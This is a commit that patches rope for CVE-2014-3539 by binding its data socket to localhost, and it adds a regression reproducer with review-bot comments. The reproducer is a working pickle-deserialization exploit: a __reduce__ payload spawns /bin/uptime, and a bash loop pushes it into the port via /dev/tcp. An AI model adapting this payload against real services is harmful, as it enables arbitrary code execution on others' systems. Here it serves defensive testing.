Commit 7f19bb6d authored by Arnaud Fontaine

Mitigations for CVE-2014-3539 from the upstream author's personal repository

(https://github.com/mcepl/rope):

  commit a2ea5f98d18ed037090afb048a48f87b515ff8dc
  Author: Matěj Cepl <mcepl@cepl.eu>
  Date:   Tue Feb 10 12:34:20 2015 +0100

      Just add reporter’s suggested reproducer

  commit a6cb534debe9aff623b6b19ae2dedbf872069a50
  Author: Matej Cepl <mcepl@cepl.eu>
  Date:   Thu Feb 12 01:12:15 2015 +0100

      limit socket connections to localhost

Patch-Name: CVE-2014-3539.patch
parent 835afd55
...@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver): ...@@ -116,7 +116,7 @@ class _SocketReceiver(_MessageReceiver):
self.data_port = 3037 self.data_port = 3037
while self.data_port < 4000: while self.data_port < 4000:
try: try:
self.server_socket.bind(('', self.data_port)) self.server_socket.bind(('127.0.0.1', self.data_port))
break break
except socket.error: except socket.error:
self.data_port += 1 self.data_port += 1
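Review bot: Binding to `'127.0.0.1'` keeps the data port off the network, but it does not authenticate whoever connects to it: any process on the same host can still reach port 3037 (or the next free port up to 3999), and the reproducer added in this commit shows that what arrives on this port is unpickled, with a `__reduce__` payload that spawns a subprocess. The bind line deserves a comment recording that constraint so it is not loosened again later, e.g. `# Loopback only (CVE-2014-3539): data read from this port is unpickled, so it must never be reachable from the network.` A follow-up that replaces pickle with a format that cannot execute code on load, or that verifies the connecting peer, is worth tracking as a separate issue. The enclosing method starts outside the hunk.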
#!/usr/bin/env python
# CVE-2014-3539 reproducer/exploit
# Vasyl Kaigorodov <vkaigoro@redhat.com>
# Tested on Python 2.7.x
import sys
from rope.base import project
try:
open('payload.txt', 'r')
except IOError:
print("payload.txt not found, run:")
print("\tpython generate_payload.py")
sys.exit(1)
myproject = project.Project('project/')
res = myproject.get_resource("hello.py")
myproject.pycore.run_module(res)
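Review bot: The `open('payload.txt', 'r')` call in the `try` block is used only as an existence check and the returned handle is never closed; `os.path.isfile('payload.txt')` (or `with open('payload.txt', 'r'): pass` if the open itself is the point) states the intent and leaks nothing. Since the header says the script was tested on Python 2.7 only, a short module docstring noting that this is the regression reproducer driven by `run_reproducer.sh`, and that `payload.txt` is the committed output of `generate_payload.py`, would spare the next reader a trip through the README.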
== List of files ==
project/ - directory containing an example python module
CVE-2014-3539.py - python script which tries to load an example python module
for re-factoring (normal workflow simulation)
generate_payload.py - generates payload.txt (evil code to run)
payload.txt - example payload (running /bin/uptime)
run_reproducer.sh - main file that sticks above together
== Usage ==
Run ./run_reproducer.sh.
If the system is vulnerable, you'll see the output similar to below:
$ ./run_reproducer.sh
SUCCESS: 15:13:46 up 21:26, 2 users, load average: 0.02, 0.63, 1.01
import os.path
import subprocess
try:
import unittest2 as unittest
except ImportError:
import unittest
class TestCVE20143539(unittest.TestCase):
def test_case(self):
cur_dir = os.path.dirname(__file__)
script_name = os.path.join(cur_dir, 'run_reproducer.sh')
pid = subprocess.Popen([script_name], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=cur_dir)
pid.communicate()
self.assertEquals(pid.returncode, 0)
def suite():
result = unittest.TestSuite()
result.addTests(unittest.makeSuite(TestCVE20143539))
return result
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
unittest.main()
else:
runner = unittest.TextTestRunner()
res = runner.run(suite())
sys.exit(not res.wasSuccessful())
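Review bot: `test_case` cannot fail when the port is still reachable: `pid.communicate()` discards stdout, and the only assertion is on the return code, which `run_reproducer.sh` takes from `python CVE-2014-3539.py` and which appears to be 0 whether or not the payload was delivered, while the README says the signal of a vulnerable system is the `SUCCESS:` marker on stdout. Capture the output and check the marker is absent: `out, _ = pid.communicate()` then `self.assertEqual(pid.returncode, 0)` and `self.assertNotIn(b'SUCCESS', out)`. `assertEquals` is a deprecated alias of `assertEqual`, and `pid` holds a `Popen` object, so `proc` would be the more accurate name. The test also needs bash with `/dev/tcp` and `killall`, so an `@unittest.skipUnless(...)` guard on those would keep it from failing for unrelated reasons on other platforms.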
import cPickle
import subprocess
class RunBinSh(object):
def __reduce__(self):
return (subprocess.Popen, (('/bin/uptime',),))
open('payload.txt', 'w').write(cPickle.dumps(RunBinSh()))
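Review bot: The `open('payload.txt', 'w').write(...)` line relies on the interpreter closing the file when the temporary handle is collected; `with open('payload.txt', 'wb') as f: f.write(cPickle.dumps(RunBinSh()))` closes it deterministically and writes the pickle as bytes. `cPickle` exists only on Python 2, which matches the "Tested on Python 2.7.x" header of the companion script; a one-line comment stating that the committed `payload.txt` is this script's output would explain why both are checked in.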
csubprocess
Popen
p1
((S'/bin/uptime'
p2
tp3
tp4
Rp5
.
\ No newline at end of file
#!/bin/bash
export PYTHONPATH=$(readlink -f ../..):$PYTHONPATH
trap "killall -- $(basename $0)" EXIT
(while : ; do
( cat payload.txt > /dev/tcp/0.0.0.0/3037; ) &>/dev/null \
&& echo -n "SUCCESS: "
done)&
python CVE-2014-3539.py 2>/dev/null
exit $?
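Review bot: `trap "killall -- $(basename $0)" EXIT` kills every process carrying the script's name, including concurrent runs of the same test and not necessarily the backgrounded subshell it is meant to stop; capturing its pid is more precise, e.g. `done)& LOOP_PID=$!` followed by `trap 'kill "$LOOP_PID" 2>/dev/null' EXIT`. The loop also spins without any pause, so a `sleep 0.1` per iteration would keep it from pegging a CPU for the whole run. On Linux a connect to `0.0.0.0` is delivered to the local host, so this loop will still reach a listener bound to `127.0.0.1`; as a regression check for the loopback-only bind it therefore only shows the port is open, and a meaningful check would have to be driven from a non-loopback source address.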
...@@ -16,6 +16,8 @@ import ropetest.simplifytest ...@@ -16,6 +16,8 @@ import ropetest.simplifytest
import ropetest.contrib import ropetest.contrib
import ropetest.refactor import ropetest.refactor
import ropetest.CVE20143539
def suite(): def suite():
result = unittest.TestSuite() result = unittest.TestSuite()
...@@ -33,6 +35,7 @@ def suite(): ...@@ -33,6 +35,7 @@ def suite():
result.addTests(ropetest.refactor.suite()) result.addTests(ropetest.refactor.suite())
result.addTests(ropetest.contrib.suite()) result.addTests(ropetest.contrib.suite())
result.addTests(ropetest.CVE20143539.suite())
return result return result
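Review bot: Adding `import ropetest.CVE20143539` at package top level and `result.addTests(ropetest.CVE20143539.suite())` in the second hunk makes every run of the default rope suite depend on bash, `/dev/tcp`, `killall` and a free port in 3037–3999, none of which the rest of the suite needs. Either guard the registration, or let the test module skip itself on platforms lacking those tools, so the reproducer does not become a flaky failure for everyone else. `suite()` begins in the first hunk and is cut across the two hunks of this section.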